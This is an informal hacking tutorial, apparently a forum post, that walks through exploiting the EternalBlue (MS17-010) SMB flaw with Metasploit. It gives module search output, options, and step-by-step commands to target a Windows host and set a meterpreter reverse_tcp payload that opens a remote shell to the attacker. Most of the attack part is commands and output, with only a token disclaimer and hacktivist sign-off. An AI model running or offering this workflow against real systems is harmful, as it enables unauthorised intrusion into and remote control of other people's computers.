Greetings, hacker. My English is quite bad, so correct me if I am wrong, cuz we learn from our mistakes. So let's begin.
EternalBlue is an exploit most likely developed by the NSA as a former zero-day. It was released in 2017 by the Shadow Brokers, a hacker group known for leaking tools and exploits used by the Equation Group, which has possible ties to the Tailored Access Operations unit of the NSA.
EternalBlue, also known as MS17-010, is a vulnerability in Microsoft’s Server Message Block (SMB) protocol. SMB allows systems to share access to files, printers, and other resources on the network. The vulnerability exists because earlier versions of SMB contain a flaw that lets an attacker establish a null session connection via anonymous login. An attacker can then send malformed packets and ultimately execute arbitrary commands on the target.
Step 1
The first thing we need to do is open up the terminal and start Metasploit. Type service postgresql start to initialize the PostgreSQL database, if it is not running already, followed by msfconsole.
Step 2
search eternalblue
It will show output like this:

    Matching Modules
    ================

       Name                                           Disclosure Date  Rank     Check  Description
       ----                                           ---------------  ----     -----  -----------
       auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
       auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
       exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
       exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
       exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
There is an auxiliary scanner that we can run to determine if a target is vulnerable to MS17-010.
Step 3
Once we discover that the target is vulnerable to EternalBlue (MS17-010), we can enter the command
use exploit/windows/smb/ms17_010_eternalblue
Then type show options
    Module options (exploit/windows/smb/ms17_010_eternalblue):

       Name           Current Setting  Required  Description
       ----           ---------------  --------  -----------
       RHOSTS                          yes       The target address range or CIDR identifier
       RPORT          445              yes       The target port (TCP)
       SMBDomain      .                no        (Optional) The Windows domain to use for authentication
       SMBPass                         no        (Optional) The password for the specified username
       SMBUser                         no        (Optional) The username to authenticate as
       VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
       VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

    Exploit target:

       Id  Name
       --  ----
       0   Windows 7 and Server 2008 R2 (x64) All Service Packs
Set rhost to the target IP, like 192.168.bla.bla.bla
Set lhost to your IP, bla.bla.bla.blaa.bla
Set lport to any port, like 4444 or 8080
Set processinject explorer.exe
set payload windows/x64/meterpreter/reverse_tcp
Note: do not change RPORT. Leave it as it is, cuz it works on port 445; if you change RPORT it won't work.
And last, you have to type exploit
And enjoy your hack [but don't do it for malicious purposes, I am not responsible for that]
If I left something wrong, correct it. Thanks …
We r anonymous
We r legion
Expect us